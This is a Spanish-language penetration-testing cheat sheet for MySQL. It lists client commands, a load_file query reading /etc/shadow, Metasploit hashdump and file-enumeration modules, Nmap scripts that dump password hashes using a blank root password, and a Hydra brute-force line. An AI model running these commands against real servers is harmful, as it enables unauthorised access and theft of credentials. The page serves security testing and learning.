MySQL

Comandos básicos

Acceso sin contraseña como <usuario> : mysql -h -u <usuario>

Acceso con contraseña como <usuario> : mysql -h -u <usuario> -p

Enumeración de BDs : show databases;

Usar BD : use <BD>;

Mostrar tablas : show tables;

Consultas : select * from <table>;

Visualizar archivo local del equipo : select load_file(”/etc/shadow”);

Metasploit

A continuación se presentan algunos de los módulos que podemos usar en metasploit

Enumeración de directorios

auxiliary/scanner/mysql/mysql_writable_dirs

Extracción de hashes con hashdump

auxiliary/scanner/mysql/mysql_hashdump

Versión

auxiliary/scanner/mysql/mysql_version

Enumerar Archivos

auxiliary/scanner/mysql/mysql_file_enum

Obtener Hashes

auxiliary/scanner/mysql/mysql_hashdump

Disco Escribibles

auxiliary/scanner/mysql/mysql_writable_dirs

Ejecutar comando

auxiliary/admin/mysql/mysql_sql

Nmap

Enumerar posibles usuarios con autenticación sin contraseña

nmap <IP> -sV -p 3306 —script=mysql-empty-password

Enumeración de información sobre la base de datos

nmap <IP> -sV -p 3306 —script=mysql-info

Enumeración de usuarios

nmap <IP> -sV -p 3306 —script=mysql-users —script-args=”mysqluser=’root’,mysqlpass=’’”

Dumpear hashes de usuarios

nmap <IP> -sV -p 3306 —script=mysql-dump-hashes —script-args=”username=’root’,password=’’”

Enumerar BDs

nmap <IP> -sV -p 3306 —script=mysql-databases —script-args=”mysqluser=’root’,mysqlpass=’’”

Fuerza Bruta

hydra -l root -P <diccionario> mysql://<IP>

Última actualización hace 1 año

hashtagComandos básicos

hashtagMetasploit

hashtagEnumeración de directorios

hashtagExtracción de hashes con hashdump

hashtagVersión

hashtagEnumerar Archivos

hashtagObtener Hashes

hashtagDisco Escribibles

hashtagEjecutar comando

hashtagNmap

hashtagEnumerar posibles usuarios con autenticación sin contraseña

hashtagEnumeración de información sobre la base de datos

hashtagEnumeración de usuarios

hashtagDumpear hashes de usuarios

hashtagEnumerar BDs

hashtagFuerza Bruta